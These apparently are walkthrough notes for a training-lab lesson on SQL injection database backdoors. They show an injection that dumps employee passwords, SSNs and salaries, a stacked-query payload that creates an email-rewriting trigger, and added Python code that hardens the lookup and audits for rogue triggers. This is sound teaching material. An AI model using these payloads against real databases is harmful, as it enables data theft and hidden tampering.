Injection Flaws - Database backdoors
- Input : 101 (the user ID)
Result :
User ID | Password | SSN | Salary | Email |
---|---|---|---|---|
101 | larry | 386-09-5451 | 55000 | larry@stooges.com |
- input : o
[select userid, password, ssn, salary, email from employee where userid=o]
Column targets: userid, password, ssn, salary, email. Table target: employee.
- Try the injection
Result :
User ID | Password | SSN | Salary | Email |
---|---|---|---|---|
101 | larry | 386-09-5451 | 55000 | larry@stooges.com |
102 | moe | 936-18-4524 | 140000 | moe@stooges.com |
103 | curly | 961-08-0047 | 50000 | curly@stooges.com |
104 | eric | 445-66-5565 | 13000 | eric@modelsrus.com |
105 | tom | 792-14-6364 | 80000 | tom@wb.com |
106 | jerry | 858-55-4452 | 70000 | jerry@wb.com |
107 | david | 439-20-9405 | 100000 | david@modelsrus.com |
108 | bruce | 707-95-9482 | 110000 | bruce@modelsrus.com |
109 | sean | 136-55-1046 | 130000 | sean@modelsrus.com |
110 | joanne | 789-54-2413 | 90000 | joanne@modelsrus.com |
111 | john | 129-69-4572 | 200000 | john@guns.com |
112 | socks | 111-111-1111 | 450000 | neville@modelsrus.com |
- Injection complete
Stage 2: Use String SQL Injection to inject a backdoor or DB worm
SQL injection statement:
105; CREATE TRIGGER myBackDoor
BEFORE INSERT ON employee
FOR EACH ROW BEGIN
UPDATE employee SET email='john@hackme.com'
WHERE userid = 105
Full SQL statement:
select userid, password, ssn, salary, email
from employee
where userid=105; CREATE TRIGGER myBackDoor
BEFORE INSERT ON employee
FOR EACH ROW BEGIN
UPDATE employee SET email='john@hackme.com'
WHERE userid = 105
Result :
User ID | Password | SSN | Salary | Email |
---|---|---|---|---|
105 | tom | 792-14-6364 | 99999 | tom@wb.com |
*Note* that nothing will actually be executed
because the current underlying DB doesn't support triggers.
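
The defensive side of this lesson, as an added example that is not part of the original notes or of the lesson's own code: a lookup that validates the ID and binds it as a parameter, plus an audit that lists triggers missing from an allow-list. It assumes an in-memory SQLite database (which, unlike the lesson's DB, supports triggers); the function names and the two-row sample table are constructed for illustration.

```python
import re
import sqlite3

COLUMNS = "userid, password, ssn, salary, email"

def make_db():
    """Constructed sample: two rows copied from the page's employee table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE employee (userid INTEGER PRIMARY KEY, password TEXT,"
               " ssn TEXT, salary INTEGER, email TEXT)")
    db.executemany("INSERT INTO employee VALUES (?, ?, ?, ?, ?)", [
        (101, "larry", "386-09-5451", 55000, "larry@stooges.com"),
        (105, "tom", "792-14-6364", 80000, "tom@wb.com"),
    ])
    return db

def lookup_safe(db, user_input):
    """Hardened lookup: accept digits only, then bind the value as a parameter
    so it can never become part of the SQL text."""
    if not re.fullmatch(r"[0-9]{1,9}", user_input):
        raise ValueError("userid must be a short decimal number")
    sql = f"select {COLUMNS} from employee where userid = ?"
    return db.execute(sql, (int(user_input),)).fetchall()

def unexpected_triggers(db, allowed=frozenset()):
    """Audit: triggers present in the schema that are not on the allow-list."""
    rows = db.execute("SELECT name, tbl_name FROM sqlite_master WHERE type = 'trigger'")
    return [(name, table) for name, table in rows if name not in allowed]

def plant_sample_trigger(db):
    """Constructed fixture: the page's trigger, closed with END for SQLite,
    created directly so the audit has something to find."""
    db.execute("CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW "
               "BEGIN UPDATE employee SET email='john@hackme.com' WHERE userid = 105; END")

if __name__ == "__main__":
    db = make_db()
    print(lookup_safe(db, "105"))
    try:
        lookup_safe(db, "105; CREATE TRIGGER myBackDoor BEFORE INSERT ON employee")
    except ValueError as exc:
        print("rejected:", exc)
    print(unexpected_triggers(db))   # nothing was created by the rejected input
    plant_sample_trigger(db)
    print(unexpected_triggers(db))   # the audit now reports the trigger
```

On other database engines the same audit reads the engine's own trigger catalog instead of `sqlite_master`.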